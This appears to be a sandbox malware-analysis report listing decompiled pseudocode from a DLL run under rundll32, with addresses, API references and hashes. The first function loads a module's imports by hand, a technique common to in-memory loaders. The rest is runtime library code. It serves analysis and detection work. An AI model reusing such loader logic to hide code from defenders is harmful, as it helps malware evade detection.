                                                                                                                                Function 100041A0, Relevance: 6.4, APIs: 5, Instructions: 145COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 98%
                                                                                                                                			E100041A0(signed int _a4) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr* _t45;
				intOrPtr _t48;
				intOrPtr _t53;
				void _t57;
				signed int _t58;
				void* _t60;
				signed int _t63;
				intOrPtr _t69;
				void* _t87;
				signed int* _t91;
				intOrPtr* _t93;
				intOrPtr _t94;
				signed int* _t95;
				void* _t97;
				void* _t98;

				_t97 =  &_v8;
				_t93 = _a4;
				_t94 =  *((intOrPtr*)(_t93 + 4));
				_t45 =  *_t93 - 0xffffff80;
				_v8 = _t94;
				_a4 = 1;
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					_t87 =  *_t45 + _t94;
					_v4 = _t87;
					if(IsBadReadPtr(_t87, 0x14) != 0) {
						L21:
						return _a4;
					} else {
						while(1) {
							_t48 =  *((intOrPtr*)(_t87 + 0xc));
							if(_t48 == 0) {
								break;
							}
							_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x1c))))(_t48 + _t94,  *((intOrPtr*)(_t93 + 0x28)));
							_t98 = _t97 + 8;
							if(_t69 == 0) {
								SetLastError(0x7e);
								_a4 = 0;
								return _a4;
							} else {
								_t53 = E10003CE0( *((intOrPtr*)(_t93 + 8)), 4 +  *(_t93 + 0xc) * 4);
								_t97 = _t98 + 8;
								if(_t53 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
									SetLastError(0xe);
									_a4 = 0;
									return _a4;
								} else {
									 *((intOrPtr*)(_t93 + 8)) = _t53;
									 *((intOrPtr*)(_t53 +  *(_t93 + 0xc) * 4)) = _t69;
									 *(_t93 + 0xc) =  *(_t93 + 0xc) + 1;
									_t57 =  *_t87;
									if(_t57 == 0) {
										_t95 = _t94 +  *((intOrPtr*)(_t87 + 0x10));
										_t91 = _t95;
									} else {
										_t95 = _t94 + _t57;
										_t91 =  *((intOrPtr*)(_t87 + 0x10)) + _v8;
									}
									_t58 =  *_t95;
									if(_t58 == 0) {
										L17:
										_t60 = _v4 + 0x14;
										_v4 = _t60;
										if(IsBadReadPtr(_t60, 0x14) != 0) {
											break;
										} else {
											_t94 = _v8;
											_t87 = _v4;
											continue;
										}
									} else {
										while(1) {
											_push( *((intOrPtr*)(_t93 + 0x28)));
											if(_t58 >= 0) {
												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 + _v8 + 2);
											} else {
												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 & 0x0000ffff);
											}
											_t97 = _t97 + 0xc;
											 *_t91 = _t63;
											if(_t63 == 0) {
												break;
											}
											_t58 = _a4;
											_t91 =  &(_t91[1]);
											if(_t58 != 0) {
												continue;
											} else {
												goto L17;
											}
											goto L24;
										}
										_a4 = 0;
										 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
										SetLastError(0x7f);
										break;
									}
								}
							}
							goto L24;
						}
						goto L21;
					}
				} else {
					return 1;
				}
				L24:
			}




















                                                                                                                                0x100041a0
                                                                                                                                0x100041a5
                                                                                                                                0x100041ab
                                                                                                                                0x100041ae
                                                                                                                                0x100041b5
                                                                                                                                0x100041b9
                                                                                                                                0x100041c1
                                                                                                                                0x100041d3
                                                                                                                                0x100041d8
                                                                                                                                0x100041e4
                                                                                                                                0x100042de
                                                                                                                                0x100042e8
                                                                                                                                0x100041ea
                                                                                                                                0x100041f0
                                                                                                                                0x100041f0
                                                                                                                                0x100041f5
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10004207
                                                                                                                                0x10004209
                                                                                                                                0x1000420e
                                                                                                                                0x100042ed
                                                                                                                                0x100042f5
                                                                                                                                0x10004306
                                                                                                                                0x10004214
                                                                                                                                0x10004223
                                                                                                                                0x10004228
                                                                                                                                0x1000422d
                                                                                                                                0x10004311
                                                                                                                                0x10004318
                                                                                                                                0x10004320
                                                                                                                                0x10004331
                                                                                                                                0x10004233
                                                                                                                                0x10004236
                                                                                                                                0x10004239
                                                                                                                                0x1000423c
                                                                                                                                0x1000423f
                                                                                                                                0x10004243
                                                                                                                                0x10004253
                                                                                                                                0x10004255
                                                                                                                                0x10004245
                                                                                                                                0x10004248
                                                                                                                                0x1000424a
                                                                                                                                0x1000424a
                                                                                                                                0x10004257
                                                                                                                                0x1000425c
                                                                                                                                0x1000429b
                                                                                                                                0x1000429f
                                                                                                                                0x100042a5
                                                                                                                                0x100042b1
                                                                                                                                0x00000000
                                                                                                                                0x100042b3
                                                                                                                                0x100042b3
                                                                                                                                0x100042b7
                                                                                                                                0x00000000
                                                                                                                                0x100042b7
                                                                                                                                0x10004260
                                                                                                                                0x10004260
                                                                                                                                0x10004263
                                                                                                                                0x10004266
                                                                                                                                0x10004283
                                                                                                                                0x10004268
                                                                                                                                0x10004272
                                                                                                                                0x10004272
                                                                                                                                0x10004285
                                                                                                                                0x10004288
                                                                                                                                0x1000428c
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1000428e
                                                                                                                                0x10004294
                                                                                                                                0x10004299
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10004299
                                                                                                                                0x100042c8
                                                                                                                                0x100042d0
                                                                                                                                0x100042d7
                                                                                                                                0x00000000
                                                                                                                                0x100042d7
                                                                                                                                0x1000425c
                                                                                                                                0x1000422d
                                                                                                                                0x00000000
                                                                                                                                0x1000420e
                                                                                                                                0x00000000
                                                                                                                                0x100042dd
                                                                                                                                0x100041c4
                                                                                                                                0x100041cd
                                                                                                                                0x100041cd
                                                                                                                                0x00000000

                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?), ref: 100041DC
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?,?,00000000,00000000,?,00000000), ref: 100042A9
                                                                                                                                • SetLastError.KERNEL32(0000007F,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 100042D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$ErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2715074504-0
                                                                                                                                • Opcode ID: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
                                                                                                                                • Instruction ID: efa1043a0b20c9ed80e11ee60e030ac585fb5041ac03c1c204f013357def7678
                                                                                                                                • Opcode Fuzzy Hash: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
                                                                                                                                • Instruction Fuzzy Hash: 8041AFB12007029BE300CF69EC84A57B3E8FF88794F028529F94587350EB31F919CBA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100054A1, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E100054A1(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E10007B94(E100154E3, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E100050D9(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E10008952(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E1000540E(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
								_t58 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E10004AEE(E10005335(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E10008C53(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c));
											E10001270(_t130 - 0x2c, _t122, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E100068D7(_t95, _t83, _t130 - 0x2d, 1, E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E10001220(_t130 - 0x2c, _t130, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E1000511D(__eflags, _t130 - 0x2d, _t52);
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E10007BDE(_t95, _t123, _t129);
			}










                                                                                                                                0x100054a1
                                                                                                                                0x100054a1
                                                                                                                                0x100054a1
                                                                                                                                0x100054a1
                                                                                                                                0x100054a8
                                                                                                                                0x100054ad
                                                                                                                                0x100054b6
                                                                                                                                0x100054e0
                                                                                                                                0x100054e3
                                                                                                                                0x100054e5
                                                                                                                                0x100054ec
                                                                                                                                0x100054f0
                                                                                                                                0x1000550b
                                                                                                                                0x10005510
                                                                                                                                0x100055db
                                                                                                                                0x100055db
                                                                                                                                0x100055de
                                                                                                                                0x100055e4
                                                                                                                                0x100055e7
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1000551f
                                                                                                                                0x10005532
                                                                                                                                0x1000553a
                                                                                                                                0x1000554a
                                                                                                                                0x10005552
                                                                                                                                0x10005554
                                                                                                                                0x10005567
                                                                                                                                0x10005571
                                                                                                                                0x10005574
                                                                                                                                0x10005576
                                                                                                                                0x00000000
                                                                                                                                0x10005578
                                                                                                                                0x1000557a
                                                                                                                                0x1000557b
                                                                                                                                0x1000557d
                                                                                                                                0x100055b3
                                                                                                                                0x100055b6
                                                                                                                                0x100055b9
                                                                                                                                0x10005619
                                                                                                                                0x10005630
                                                                                                                                0x10005630
                                                                                                                                0x10005632
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10005620
                                                                                                                                0x10005623
                                                                                                                                0x10005623
                                                                                                                                0x10005628
                                                                                                                                0x10005629
                                                                                                                                0x1000562f
                                                                                                                                0x00000000
                                                                                                                                0x100055bb
                                                                                                                                0x100055ce
                                                                                                                                0x100055d6
                                                                                                                                0x00000000
                                                                                                                                0x100055d6
                                                                                                                                0x1000557f
                                                                                                                                0x1000557f
                                                                                                                                0x10005582
                                                                                                                                0x00000000
                                                                                                                                0x10005584
                                                                                                                                0x10005584
                                                                                                                                0x10005587
                                                                                                                                0x00000000
                                                                                                                                0x10005589
                                                                                                                                0x100055a3
                                                                                                                                0x10005634
                                                                                                                                0x10005634
                                                                                                                                0x10005634
                                                                                                                                0x10005587
                                                                                                                                0x10005582
                                                                                                                                0x1000557d
                                                                                                                                0x100055f0
                                                                                                                                0x100055f7
                                                                                                                                0x00000000
                                                                                                                                0x100055fc
                                                                                                                                0x100055ed
                                                                                                                                0x00000000
                                                                                                                                0x100054f2
                                                                                                                                0x100054f7
                                                                                                                                0x100054fe
                                                                                                                                0x10005500
                                                                                                                                0x00000000
                                                                                                                                0x10005502
                                                                                                                                0x10005502
                                                                                                                                0x10005500
                                                                                                                                0x100054e7
                                                                                                                                0x100054e7
                                                                                                                                0x100054e7
                                                                                                                                0x100054c8
                                                                                                                                0x100054cb
                                                                                                                                0x100054cd
                                                                                                                                0x100054d5
                                                                                                                                0x100054d7
                                                                                                                                0x100054da
                                                                                                                                0x100054df

                                                                                                                                APIs
                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 100054A8
                                                                                                                                • _fgetc.LIBCMT ref: 100055DE
                                                                                                                                  • Part of subcall function 1000540E: std::_String_base::_Xlen.LIBCPMT ref: 10005424
                                                                                                                                • _memcpy_s.LIBCMT ref: 100055A3
                                                                                                                                • _ungetc.LIBCMT ref: 10005629
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 9762108-0
                                                                                                                                • Opcode ID: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
                                                                                                                                • Instruction ID: 5dbc0edad074bc516d1e3aa92765b13b845c281a9169638769e3243b87268825
                                                                                                                                • Opcode Fuzzy Hash: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
                                                                                                                                • Instruction Fuzzy Hash: A751A2769005099FEB14CBB4C8559DFB3F9FF08392B60451AE551E7298EE32FA44CB60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10008FA9, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 91%
                                                                                                                                			E10008FA9(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E1000E577(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E1000E545(_t90, _t98, _t100));
										_t74 = E1000EE57(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E10008CC5(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E10006BF0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E1000B02E(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E1000708C(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                0x10008fa9
                                                                                                                                0x10008fb9
                                                                                                                                0x10008fdf
                                                                                                                                0x00000000
                                                                                                                                0x10008fc0
                                                                                                                                0x10008fc0
                                                                                                                                0x10008fc3
                                                                                                                                0x10008fc5
                                                                                                                                0x10008fe6
                                                                                                                                0x10008fe9
                                                                                                                                0x10008feb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10008fed
                                                                                                                                0x10008ff2
                                                                                                                                0x10008ff5
                                                                                                                                0x10008ff8
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10008ffd
                                                                                                                                0x10009001
                                                                                                                                0x10009008
                                                                                                                                0x1000900b
                                                                                                                                0x1000900e
                                                                                                                                0x10009010
                                                                                                                                0x1000901a
                                                                                                                                0x10009012
                                                                                                                                0x10009015
                                                                                                                                0x10009015
                                                                                                                                0x10009021
                                                                                                                                0x10009023
                                                                                                                                0x100090e8
                                                                                                                                0x00000000
                                                                                                                                0x10009029
                                                                                                                                0x10009029
                                                                                                                                0x1000902c
                                                                                                                                0x1000902c
                                                                                                                                0x10009032
                                                                                                                                0x10009063
                                                                                                                                0x10009063
                                                                                                                                0x10009066
                                                                                                                                0x100090bf
                                                                                                                                0x100090c6
                                                                                                                                0x100090c9
                                                                                                                                0x100090f4
                                                                                                                                0x100090f4
                                                                                                                                0x100090f6
                                                                                                                                0x00000000
                                                                                                                                0x100090fa
                                                                                                                                0x100090cb
                                                                                                                                0x100090ce
                                                                                                                                0x100090d1
                                                                                                                                0x100090d2
                                                                                                                                0x100090d5
                                                                                                                                0x100090d7
                                                                                                                                0x100090d9
                                                                                                                                0x100090d9
                                                                                                                                0x00000000
                                                                                                                                0x100090d7
                                                                                                                                0x10009068
                                                                                                                                0x1000906a
                                                                                                                                0x10009077
                                                                                                                                0x10009077
                                                                                                                                0x1000907b
                                                                                                                                0x1000907d
                                                                                                                                0x10009081
                                                                                                                                0x10009083
                                                                                                                                0x10009086
                                                                                                                                0x10009086
                                                                                                                                0x10009086
                                                                                                                                0x10009088
                                                                                                                                0x10009089
                                                                                                                                0x10009093
                                                                                                                                0x10009094
                                                                                                                                0x10009099
                                                                                                                                0x1000909c
                                                                                                                                0x1000909f
                                                                                                                                0x10009102
                                                                                                                                0x10009102
                                                                                                                                0x10009106
                                                                                                                                0x00000000
                                                                                                                                0x100090a1
                                                                                                                                0x100090a1
                                                                                                                                0x100090a3
                                                                                                                                0x100090a5
                                                                                                                                0x100090a7
                                                                                                                                0x100090a7
                                                                                                                                0x100090a9
                                                                                                                                0x100090ac
                                                                                                                                0x100090ae
                                                                                                                                0x100090b0
                                                                                                                                0x00000000
                                                                                                                                0x100090b2
                                                                                                                                0x100090b2
                                                                                                                                0x100090b2
                                                                                                                                0x00000000
                                                                                                                                0x100090b2
                                                                                                                                0x100090b0
                                                                                                                                0x1000909f
                                                                                                                                0x1000906d
                                                                                                                                0x10009073
                                                                                                                                0x10009075
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10009075
                                                                                                                                0x10009034
                                                                                                                                0x10009037
                                                                                                                                0x10009039
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1000903b
                                                                                                                                0x100090f0
                                                                                                                                0x100090f0
                                                                                                                                0x100090f0
                                                                                                                                0x00000000
                                                                                                                                0x100090f0
                                                                                                                                0x10009041
                                                                                                                                0x10009043
                                                                                                                                0x10009045
                                                                                                                                0x10009047
                                                                                                                                0x10009047
                                                                                                                                0x1000904f
                                                                                                                                0x10009054
                                                                                                                                0x10009057
                                                                                                                                0x10009059
                                                                                                                                0x1000905c
                                                                                                                                0x1000905e
                                                                                                                                0x00000000
                                                                                                                                0x100090e0
                                                                                                                                0x100090e0
                                                                                                                                0x100090e0
                                                                                                                                0x00000000
                                                                                                                                0x10009029
                                                                                                                                0x10009023
                                                                                                                                0x10008fc7
                                                                                                                                0x10008fc7
                                                                                                                                0x10008fcc
                                                                                                                                0x10008fcd
                                                                                                                                0x10008fce
                                                                                                                                0x10008fcf
                                                                                                                                0x10008fd0
                                                                                                                                0x10008fd1
                                                                                                                                0x10008fd7
                                                                                                                                0x00000000
                                                                                                                                0x10008fdc

                                                                                                                                APIs
                                                                                                                                • __flush.LIBCMT ref: 1000906D
                                                                                                                                • __fileno.LIBCMT ref: 1000908D
                                                                                                                                • __locking.LIBCMT ref: 10009094
                                                                                                                                • __flsbuf.LIBCMT ref: 100090BF
                                                                                                                                  • Part of subcall function 1000B02E: __getptd_noexit.LIBCMT ref: 1000B02E
                                                                                                                                  • Part of subcall function 1000708C: __decode_pointer.LIBCMT ref: 10007097
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3240763771-0
                                                                                                                                • Opcode ID: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
                                                                                                                                • Instruction ID: 23d6b4e30aa61f3eb1ca52232f0f9b5df6bc3795a971e9f133615fbef43ceba0
                                                                                                                                • Opcode Fuzzy Hash: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
                                                                                                                                • Instruction Fuzzy Hash: 5541B331A006459FFB14CFA988845AFB7F6FF803E0F218529E8A597158D771EE41CB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 100136B5, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E100136B5(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E10009442( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E100137E6( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000B02E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                0x100136bf
                                                                                                                                0x100136c6
                                                                                                                                0x100136dd
                                                                                                                                0x00000000
                                                                                                                                0x100136cd
                                                                                                                                0x100136cf
                                                                                                                                0x100136e9
